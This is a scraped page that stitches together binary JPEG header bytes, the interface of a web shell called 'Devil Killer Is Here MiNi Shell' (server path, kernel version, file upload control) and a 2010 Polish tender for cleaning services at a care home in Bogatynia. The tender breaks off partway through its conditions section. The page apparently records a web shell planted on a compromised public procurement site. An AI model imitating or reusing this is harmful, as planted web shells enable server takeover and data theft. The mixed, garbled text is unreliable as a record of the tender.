JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101203/394478-N-2010.html

<p class="kh_header"><b>Bogatynia: KOMPLEKSOWA USŁUGA PORZĄDKOWA ZP/U/S/2011</b><br>
<b>Numer ogłoszenia: 394478 - 2010; data zamieszczenia: 03.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Jędrek" w Opolnie Zdrój , ul. Parkowa 2, 59-920 Bogatynia, woj. dolnośląskie, tel. 0-75 7738306, faks 0-75 7738306.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu powiatowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KOMPLEKSOWA USŁUGA PORZĄDKOWA ZP/U/S/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa usługa porządkowa polegająca na codziennych czynnościach porządkowych, mających
na celu zapewnienie odpowiedniego stanu sanitarno-higienicznego pomieszczeń Domu (pokoje mieszkańców, sale dziennego 
pobytu, gabinety, pomieszczenia biurowych, korytarze, toalety, łazienki, stołówka, opróżnianiu i dezynfekcji pojemników na śmieci)
oraz myciu okien i mechanicznym czyszczeniu i konserwowaniu podłóg
WYKAZ POMIESZCZEŃ OBJĘTYCH SPRZĄTANIEM ORAZ CZĘSTOTLIWOŚĆ ICH SPRZĄTANIA Wyszczególnienie/opis czynności Ilość pomieszczeń/ Powierzchnia Rodzaj Powierzchni Częstotliwość Sprzątania Uwagi BUDYNEK A PIWNICA 1.Korytarz - zamiatanie, mycie powierzchni podłóg,35,40m2, Terakota,2 razy dziennie 2.Łazienka - zamiatanie, mycie powierzchni podłóg dezynfekcja urządzeń sanitarnych ilość:1 natrysk - 1umywalka - 1muszla - 1 4,90m2 Terakota 3 razy dziennie Łazienka - mycie powierzchni ścian,19,00m2,glazura,1 raz dziennie 3.Szatnia - zamiatanie, mycie powierzchni podłóg, 14,27m2,Terakota,2 razy dziennie 4.Sala muzyczna - zamiatanie, mycie powierzchni podłóg, 17,30m2,tarket 2 razy w tygodniu,1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 5.Sala terapii - zamiatanie, mycie powierzchni podłóg,42,80m2,Terakota,2 razy w tygodniu 6.WC - zamiatanie, mycie, dezynfekcja powierzchni podłóg i urządzeń sanitarnych 1ilość:umywalki - 1muszle - 4,10m2,Terakota,3 razy dziennie,WC - mycie powierzchni ścian,16,00m2,glazura,1 raz dziennie 7.Biuro dietetyka - zamiatanie, mycie,11,90m2,Terakota,1 raz dziennie 8.Drzwi (pełne) - mycie 14 szt,1 raz dziennie 9.Okna - mycie powierzchni wewnętrznych i zewnętrznych wraz z parapetami 3,74m2, 2 razy w roku,W miesiącach IV i X 10.Mycie opraw oświetleniowych, 11.Mycie grzejników c.o. 2 razy w roku,Przed i po sezonie grzewczym. 12. Opróżnianie, mycie, dezynfekcja koszy na śmieci, wymiana worków na śmieci i wynoszenie pełnych do śmietnika 5 szt,1 raz dziennie PARTER 13.Biuro pracowników socjalnych - zamiatanie, mycie powierzchni podłóg,14,80 m2 Tarket, 1 raz dziennie,1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 14.Biuro Kierownika Wychowania - zamiatanie, mycie powierzchni podłóg,11,90 m2 Tarket,1 raz dziennie,1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 15.Jadalnia - zamiatanie , mycie powierzchni podłóg,28,60 m2,Tarket,3 razy dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 16.Świetlica - zamiatanie, mycie powierzchni podłóg,14,30 m2,tarket ,1 raz dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 17.Gabinet zabiegowy - zamiatanie, mycie i dezynfekcja powierzchni podłóg ,21,10m2,terakota,2 razy dziennie.Gabinet zabiegowy - mycie powierzchni ścian,36,70m2,Glazura,1 raz w tygodniu 18.Kawiarnia - zamiatanie, mycie powierzchni podłóg,26,80m2,Panele,1 raz dziennie 1 raz w tygodniu konserwacja 19.Sala obserwacyjna - zamiatanie, mycie i dezynfekcja powierzchni podłóg i urządzeń sanitarnych,ilość:1 umywalka - 1wanna - 1muszla - 15,90m2,terakota 2 razy dziennie 20.Pokój mieszkalny - zamiatanie, mycie powierzchni podłóg,19,10m2,tarket 1 raz dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 21.Łazienka personelu - zamiatanie, mycie, dezynfekcja powierzchni podłóg i urządzeń sanitarnych.ilość:umywalka - 1muszla - 4,00m2,terakota,3 razy dziennie Łazienka personelu - mycie powierzchni ścian,18,00m2,glazura,1 raz dziennie 22.Łazienka - zamiatanie, mycie dezynfekcja powierzchni podłóg i urządzeń sanitarnych.ilość:natryski - 2umywalka - 1,20m2,terakota,3 razy dziennie Łazienka - mycie powierzchni ścian,22,40m2,glazura,1 raz dziennie 23.WC - zamiatanie, mycie i dezynfekcja powierzchni podłóg i urządzeń sanitarnych ilość:2 muszle -  4,80m2, terakota,3 razy dziennie, WC - mycie powierzchni ścian 19,70m2,glazura 1 raz dziennie 24.Korytarz - zamiatanie, mycie powierzchni podłóg,49,44 m2,tarket,2 razy dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 25.Drzwi (pełne) mycie,16 szt,1raz dziennie 26. Okna - mycie powierzchni wewnętrznych i zewnętrznych wraz z parapetami 24 szt,43,90m2, 2 razy w roku.W miesiącach IV i X 27.Mycie opraw lamp oświetleniowych,1 raz w roku 28.Mycie grzejników c.o. 29.Opróżnianie, mycie dezynfekcja koszy na śmieci, wymiana worków na śmieci i wynoszenie pełnych do śmietnika 10 szt,1 raz dziennie 30.Drzwi przeszklone, wejściowe - mycie dwustronne,3 szt ,2 razy dziennie 31.Schody wejściowe - zamiatanie, mycie,2 razy dziennie Odśnieżanie w sezonie I PIĘTRO 32.Pokoje mieszkalne - zamiatanie, mycie powierzchni podłóg,38,70 m2,tarket 1 raz dziennie,1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwacja 4 razy w roku 33.Pokoje mieszkalne - zamiatanie, mycie powierzchni podłóg,101,4m2,Panele 1 raz dziennie,1 raz w tygodniu konserwacja 34.Świetlica - zamiatanie, mycie powierzchni podłóg,51,9 m2,Panele,1 raz dziennie 1 raz w tygodniu konserwacja 35.Łazienka - zamiatanie, mycie i dezynfekcja powierzchni podłóg i urządzeń sanitarnych,ilość:natryski - 5umywalki - 4muszle - 3szt ,17,4m2,terakota,3 razy dziennie.Łazienka - mycie powierzchni ścian,50,00m2,glazura,1 raz dziennie 36.WC - zamiatanie, mycie i dezynfekcja powierzchni podłóg i urządzeń sanitarnych,ilość:1 muszla - 2,70m2,terakota,3 razy dziennie,WC - mycie powierzchni ścian,16,40m2, glazura,1 raz dziennie 37.Korytarz - zamiatanie, mycie powierzchni podłogowych, 49,86 m2,tarket 2 razy dziennie 1 raz w tygodni konserwacjaMechaniczne czyszczenie i konserwacja 4 razy w roku 38.Klatka schodowa - zamiatanie, mycie powierzchni stopni,12,82 m2,tarket,2 razy dziennie 1 raz w tygodni konserwacjaMechaniczne czyszczenie i konserwacja 4 razy w roku 39.Drzwi (pełne) 20 szt,1 razy dziennie 40.Okna - mycie wewnętrzne i zewnętrzne wraz z parapetami,26 szt,45,4 m2, 2 razy w roku,Miesiąc IV i X 41.Mycie opraw lamp oświetleniowych,1 raz w roku 42.Mycie grzejników c.o. ,2 razy w roku (przed i po zakończeniu sezonu grzewczego) 43.Opróżnianie, czyszczenie, dezynfekcja koszy na śmieci, wymiana worków na śmieci i wynoszenie pełnych do śmietnika 10 szt,1 raz dziennie II PIĘTRO 44.Pokoje mieszkalne - zamiatanie, mycie powierzchni podłóg,159,00 m2,Panele 1 raz dziennie,1 raz w tygodni konserwacjaMechaniczne czyszczenie i konserwacja 4 razy w roku 45.Świetlica - zamiatanie, mycie powierzchni podłóg,21,9 m2,Panele, 1 raz dziennie 1 raz w tygodni konserwacjaMechaniczne czyszczenie i konserwacja 4 razy w roku 46.Łazienka personelu - zamiatanie, mycie i dezynfekcja powierzchni podłóg i urządzeń sanitarnych,ilość muszli - 1,umywalka - 1,5,6 m2 Terakota,3 razy dziennie Łazienka personelu - mycie powierzchni ścian,18,9 m2,glazura,1 raz dziennie 47.Łazienka - zamiatanie, mycie i dezynfekcja powierzchni podłóg i urządzeń sanitarnych,ilość:muszli - 3umywalki - 4, 2natryski  ,17,90 m2,terakota,3 razy dziennie .Łazienka - mycie powierzchni ścian,51 m2,glazura 1 raz dziennie 48.WC - zamiatanie, mycie i dezynfekcja powierzchni podłogowych i urządzeń sanitarnych,2,70 m2,ilość muszli - 1,terakota,3 razy dziennie,WC - mycie powierzchni ścian,14,7 m2,glazura 1 raz dziennie 49.Korytarz - zamiatanie, mycie powierzchni podłóg,49, m2 tarket 2 razy dziennie 1 raz w tygodni konserwacjaMechaniczne czyszczenie i konserwacja 4 razy w roku 50.Klatka schodowa - zamiatanie, mycie powierzchni stopni,12,9 m2,tarket 2 razy dziennie 1 raz w tygodni konserwacjaMechaniczne czyszczenie i konserwacja 4 razy w roku 51.Drzwi - mycie 20 szt,1 raz dziennie 52.Okna - mycie wewnętrzne i zewnętrzne wraz z parapetami,26 szt,45,4 m2, 2 razy w roku W miesiącach IV i X 53.Mycie opraw lamp oświetleniowych,1 raz w roku 54.Mycie grzejników c.o. ,2 raz w roku ( przed i po sezonie grzewczym) 55.Opróżnianie, czyszczenie, dezynfekcja koszy na śmieci, wymiana worków na śmieci i wynoszenie pełnych do śmietnika Ilość 10,1 raz dziennie BUDYNEK B PIWNICA 56.Klatka schodowa - zamiatanie, mycie powierzchni podłóg,6,00 m2,Terakota 2 razy dziennie 57.WC - zamiatanie, mycie i dezynfekcja powierzchni podłóg i urządzeń sanitarnych 1ilość:umywalka - 1, 1-muszla - 3,00 m2, Terakota,3 razy dziennie .WC - mycie powierzchni ścian,12,50 m2,glazura,1 raz dziennie 58.Korytarz - zamiatanie, mycie powierzchni podłóg,23,00 m2,Terakota,2 razy dziennie 59.Sala siłowni i rehabiltacji- zamiatanie mycie powierzchni podłóg, 35,00m2 tarket 1 raz dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 60.Szatnia - zamiatanie, mycie powierzchni podłóg,4,80 m2 tarket,1 raz dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 2 razy w roku 61.Drzwi (pełne) 5 szt,1 raz dziennie 62.Okna - mycie powierzchni wewnętrznych i zewnętrznych wraz z parapetami 2 szt,0,88m2,2 razy w roku,W miesiącach IV i X 63.Mycie opraw oświetleniowych,1 raz w roku 64.Mycie grzejników c.o.,2 razy w roku,Przed i po sezonie grzewczym 65.Opróżnianie, mycie i dezynfekcja koszy na śmieci, wymiana worków na śmieci i wynoszenie pełnych do śmietnika 2 szt,1 raz dziennie PARTER 66.Pokoje mieszkalne - zamiatanie, mycie powierzchni podłóg,104,20 m2,tarket 1 raz dziennie,1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 67.Łazienka - zamiatanie, mycie, dezynfekcja powierzchni podłóg i urządzeń sanitarnych,1ilość:natryski - 3umywalka - 1muszle - 2;6,50 m2,Terakota,3 razy dziennie.Łazienka - mycie powierzchni ścian,20,00 m2,glazura,1 raz dziennie 68.Jadalnia - zamiatanie, mycie powierzchni podłóg,44,00 m2,tarket 3 razy dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 69.Łazienka - zamiatanie, mycie i dezynfekcja podłóg i urządzeń sanitarnych 1ilość:wanna - 1umywalka - 1 4,20 m2 Terakota,3 razy dziennie ,Łazienka - mycie powierzchni ścian, 16,40 m2,Glazura 1 raz dziennie 70.WC - zamiatanie mycie i dezynfekcja powierzchni podłóg i urządzeń sanitarnych 1ilość:2 muszle 2,30 m2 terakota,3 razy dziennie, WC - mycie powierzchni ścian 12,10 m2,glazura 1 raz dziennie 71.Przedpokój - zamiatanie, mycie powierzchni podłóg,5,21 m2,Terakota,2 razy dziennie 72.Klatka schodowa - zamiatanie, mycie powierzchni stopni,11,00m2,tarket 2 razy dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 73.WC - zamiatanie, mycie dezynfekcja powierzchni podłóg i urządzeń sanitarnych 1ilość:umywalki - 1, 1 muszla 1,40 m2 Terakota,2 razy dziennie WC - mycie powierzchni ścian,6,50 m2,Glazura ,1 raz dziennie 74.Korytarz - zamiatanie, mycie powierzchni podłóg,11,80 m2,Terakota,2 razy dziennie 75.Okna - mycie zewnętrzne i wewnętrzne wraz z parapetami,16 szt 22,40 m2,2 razy w roku W miesiącach IV i X 76.Drzwi (pełne) 15 szt, 1 raz dziennie 77.Mycie opraw oświetleniowych ,1 raz w roku 78.Mycie grzejników c.o.,2 razy w roku Przed i po sezonie grzewczym 79.Opróżnianie, mycie i dezynfekcja koszy na śmieci, wymiana worków na śmieci i wynoszenie pełnych do śmietnika 6,1 raz dziennie I PIĘTRO 80.WC - zamiatanie, mycie i dezynfekcja powierzchni podłóg i urządzeń sanitarnych 1ilość:umywalki - 1, 1muszla 6,00 m2 Terakota,2 razy dziennie,WC - mycie powierzchni ścian,13,30 m2,glazura,1 raz dziennie 81.Klatka schodowa - zamiatanie, mycie powierzchni podłóg,11,14 m2,tarket 2 razy dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 82.Korytarz - zamiatanie, mycie powierzchni podłóg,10,25 m2,tarket ,2 razy dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 83.Pokój mieszkalny - zamiatanie, mycie powierzchni podłóg,15,45 m2,Panele 1 raz dziennie 84.Pokój mieszkalny - zamiatanie, mycie powierzchni podłóg,25,46 m2,tarket 1 raz dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 85.Łazienka - zamiatanie, mycie, dezynfekcja powierzchni podłóg i urządzeń sanitarnychilość:umywalka - 1muszla - 1,1 natrysk 3,52 m2,Terakota,3 razy dziennie Łazienka - mycie powierzchni ścian,16,92 m2,Glazura,1 raz dziennie 86.Drzwi(pełne) - mycie 5 szt,1 raz dziennie 87.Okna - mycie powierzchni wewnętrznych i zewnętrznych wraz z parapetami 6 szt,8,30 m2,2 razy w roku,W miesiącach IV i X 88.Mycie opraw oświetleniowych ,1 raz w roku 89.Mycie grzejników c.o.2 razy w roku Przed i po sezonie grzewczym 90.Opróżnianie, mycie, dezynfekcja koszy na śmieci, wymiana worków na śmieci i wynoszenie pełnych do smietnika II PIĘTRO 91.Klatka schodowa - zamiatanie, mycie powierzchni stopni,8,10 m2,Tarket 2 razy dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 92.Korytarz - zamiatanie, mycie powierzchni podłóg,5,43 m2,Tarket 2 razy dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 93.Klatka schodowa - zamiatanie, mycie powierzchni stopni,5,27 m2,Tarket 2 razy dziennie 1 raz w tygodniu konserwacja.Mechaniczne czyszczenie i konserwowanie 4 razy w roku 94.Pomieszczenia biurowe - zamiatanie, mycie powierzchni podłóg, odkurzanie dywanów,64,96 m2,Panele,2 razy w tygodniu,1 raz w tygodniu konserwacja 95.WC - zamiatanie, mycie powierzchni podłóg i dezynfekcja urządzeń sanitarnych 1ilość:umywalka - 1, 1muszla 4,84 m2,Terakota,2 razy w tygodniu, WC - mycie powierzchni ścian, 13,20 m2,Glazura 1 raz w tygodniu 96.Kuchenka - zamiatanie, mycie powierzchni podłóg,4,48m2,Terakota,2 razy w tygodniu 97.Drzwi (pełne) 5 szt 98.Okna - mycie powierzchni,8 szt,9,29m2,2 razy w roku W miesiącach IV i X 99.Mycie opraw oświetleniowych ,1 raz w roku 100.Mycie grzejników c.o.,2 razy w roku Przed i po sezonie grzewczym 101.Opróżnianie, mycie, dezynfekcja koszy na śmieci, wymiana worków na śmieci i wynoszenie pełnych do śmietnika Ilość,5 szt, 1 raz dziennie PODDASZE 102.Klatka schodowa - zamiatanie, mycie powierzchni stopni,7,95 m2,Tarket 2 razy dziennie Mechaniczne czyszczenie i konserwowanie 4 razy w roku 103.Łazienka - zamiatanie, mycie i dezynfekcja powierzchni podłóg 2,7,40 m2 Tarket 1 raz w tygodniu 104.Łazienka - mycie powierzchni ścian, 20,00 m2,Glazura 1 raz w tygodniu 105.Pokój gościnny - zamiatanie, mycie, konserwacja powierzchni podłóg,39,00 m2 Panele,1 raz w tygodniu 106.Drzwi (Pełne),8 szt,1 raz w tygodniu 107.Mycie opraw oświetleniowych1 raz w roku 108.Mycie grzejników c.o.2 razy w roku Przed i po sezonie grzewczym 109. Opróżnianie, mycie i dezynfekcja koszy na sieci, wymiana worków na śmieci i wynoszenie pełnych do śmietnika 3 szt,1 raz w tygodniu Do wykonania powyższych usług, wykonawca użyje własnego sprzętu i własnych środków. Ponadto zamawiający: - zastrzega sobie prawo do kontroli środków czyszczących i dezynfekujących używanych przez pracowników wykonawcy - wymaga stosowania środków odpowiednich do rodzaju powierzchni, nie zawierających składników, które mogłyby uszkodzić czyszczone powierzchnie - wymaga bieżącego zaopatrzenia w materiały i sprzęt do wykonania zleconych prac czystościowych - przekaże nieodpłatnie pomieszczenie na zaplecze socjalne i magazynowe Zamawiający we własny zakresie: - dostarczy środki do posypywania schodów wejściowych w okresie zimowym - zaopatruje się w środki higieniczne tj. papier toaletowy, ręczniki i mydło oraz nie wymaga od wykonawcy uzupełniania tych środków w pojemnikach..
4. Inne dane, parametry i informacje istotne dla przedmiotu zamówienia
1) Ogółem:
Korytarze klatki schodowe (powierzchnia - tarket): 280m2 . Zamiatanie, mycie - 2 razy dziennie. Konserwacja - 1 raz w tygodniu; Mechaniczne czyszczenie i konserwacja - 4 razy w roku
Łazienki, wc, szatnie (powierzchnia- terakota, glazura): Ilość pomieszczeń: 25. Powierzchnia podłóg: 135m2, powierzchnia ścian: 420m2
Mycie podłóg i ścian w toaletach - 3 razy dziennie. Mycie łazienek, kabin natryskowych i brodzików - 1 raz dziennie),mycie ścian - 1 raz w tygodniu. Dezynfekcja pomieszczeń i urządzeń sanitarnych.
Gabinety terapii, rehabilitacji, muzykoterapii, zabiegowy (powierzchnia - tarket): ilość pomieszczeń - 16 o powierzchni łącznie: 100m2
Zamiatanie i mycie - 1 razy dziennie. Konserwacja - 1 raz w tygodniu. Mechaniczna mycie i konserwacja 4 razy w roku
Pokoje dziennego pobytu, pokoje mieszkańców (powierzchnia - tarket): ilość pomieszczeń -  20 o łącznej powierzchni 305m2
Zamiatanie i mycie - 1 raz dziennie. Konserwacja - 1 raz w tygodniu. Mechaniczne czyszczenie i konserwacja 4 razy w roku
Jadalnia (tarket):  30m2
Zamiatanie i mycie 3 razy dziennie. Konserwacja - 1 raz w tygodniu. Mechaniczne czyszczenie i konserwacja 4 razy w roku
Pokoje mieszkańców, kawiarnia, świetlice (powierzchnia-panele): ilość pomieszczeń - 30 o łącznej powierzchni 480m2
Zamiatanie i mycie 1 raz dziennie. Konserwacja - 1 raz w tygodniu.
Okna (ilość: 110 szt, powierzchnia: 180m2)
Mycie 2 razy w roku (wiosna, jesień)
Drzwi, futryny (ilość: 111 szt)
Mycie - 1 raz dziennie
Ponadto mycie opraw oświetleniowych 1 raz w roku
Mycie grzejników 2 razy w roku, przed i po sezonie grzewczym
Opróżnianie, mycie i dezynfekcja koszy na śmieci
Mycie zamiatanie, odśnieżanie schodów wejściowych i podjazdów
2)	Wykonawca przyjmuje do realizacji stałe kompleksowe sprzątanie pomieszczeń Zamawiającego, od poniedziałku do niedzieli włącznie w godzinach od 7:00  do 22:00
Do szczegółowych zadań wynikających z postanowień umowy należeć będzie: 
Codziennie:  mycie powierzchni podłóg w pokojach mieszkalnych, świetlicach, jadalni, korytarzach,  klatkach schodowych, łazienkach i pomieszczeniach wc oraz codzienne opróżnianie pojemników na śmieci
Raz  na  tydzień:  mycie glazury w gabinecie zabiegowym i łazience w budynku B II piętro oraz sprzątanie pokoju gościnnego, łazienek,   pomieszczenia wc na poddaszu w budynku B, a także konserwowanie powierzchni podłóg
Dwa razy w tygodniu: sprzątanie sali muzycznej, sali terapii i pomieszczeń biurowych, mycie okien i grzejników
Raz na kwartał: mechaniczne mycie , czyszczenie i konserwowanie powierzchni podłóg
Dwa razy w roku: mycie okien.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.73.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw
do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie cześniej niż 6 miesięcy przed upływem terminu składania ofert. Ocena:spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
